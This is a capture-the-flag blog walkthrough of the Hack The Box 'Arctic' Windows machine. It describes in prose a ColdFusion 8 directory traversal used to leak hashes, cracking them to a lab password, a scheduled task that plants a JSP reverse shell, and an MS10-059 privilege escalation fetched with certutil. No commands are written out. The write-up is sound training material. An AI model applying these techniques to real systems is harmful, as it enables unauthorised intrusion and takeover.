CTF Walkthroughs, Hack The Box

Hack The Box – Arctic Walkthrough

January 18, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Windows machine that involved exploiting a directory traversal vulnerability in the Adobe ColdFusion web application to obtain user hashes, cracking them with an online hash lookup tool and using a scheduled task to gain remote access. Privilege escalation was possible through a Windows Kernel Exploit.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests

The only port that stands out is 8500, as the others are standard Windows ports used for RPC.

Enumerating port 8500

When visiting port 8500 on a browser, the site displays the below file listing:

When navigating to /CFIDE, it takes to another file listing:

When selecting administrator, this time an “Adobe ColdFusion 8” application is displayed:

Doing a simple searchsploit search and excluding Cross-Site scripting exploits and Metasploit modules, a few exploits are available

Directory Traversal Vulnerability

After checking a few of them, one seems to stands out as it can allow to retrieve user hashes through a Directory Traversal Vulnerability. Mirroring and analysing the exploit:

Testing the exploit on the target application – user hashes are displayed:

Using the Crackstation online hash cracker to obtain the clear-text credentials. The tool is available at https://crackstation.net/

Logging into the web application using admin/happyday

Scheduled Task Exploitation

A scheduled task can be used to remotely execute commands. The first step is to generate some shellcode using MSFvenom with the following flags:

  • -p to specify the payload type, in this case the Java reverse shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to

Navigating to Server Settings -> Mappings

Setting up a Python webserver to host the reverse shell so that it can be downloaded by the target host:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Navigating to debugging & logging -> scheduled tasks

Setting up a scheduled task that will download the reverse shell and save it on C:\ColdFusion8\wwwroot\CFIDE\administrator\exploit.jsp

The task has now been created. using the green button to execute it.

The request was received in our Python webserver

The reverse shell can then be executed by navigating to the location of the .jspfile

A call back was received which granted a reverse shell as the tolis user:

Privilege Escalation

Running the systeminfo command to enumerate the system version, build and any possible Kernel Exploits.

Saving the output of the command to a text file on the Kali host

Running the Windows Exploit Suggester script against the file to identify any vulnerabilities with this version of Windows. One of the options is MS10-059, a vulnerability that uses the Service Tracing feature of Windows as a way of capturing a SYSTEM token using a named pipe. As long as you have the “SeImpersonatePrivilege” privilege, you can then execute arbitrary code in the security context of this user.

Searching for proof of concepts available on GitHub for MS10-059:

Found an interesting script that can be used to exploit this vulnerability

Cloning the exploit from GitHub

Setting up a Python web server to host the exploit

Downloading it from the target host using the certutil tool

Setting up a Netcat listener, which will catch our reverse shell when it is executed by the victim host:

After executing the exploit this grants SYSTEM level access to the machine

Conclusion

I found this box quite interesting as there was quite a lot of research involved, first of all to find the directory traversal vulnerability, then to learn how to exploit scheduled tasks on Adobe ColdFusion and finally to escalate privileges using a known Windows vulnerability in the service tracking feature.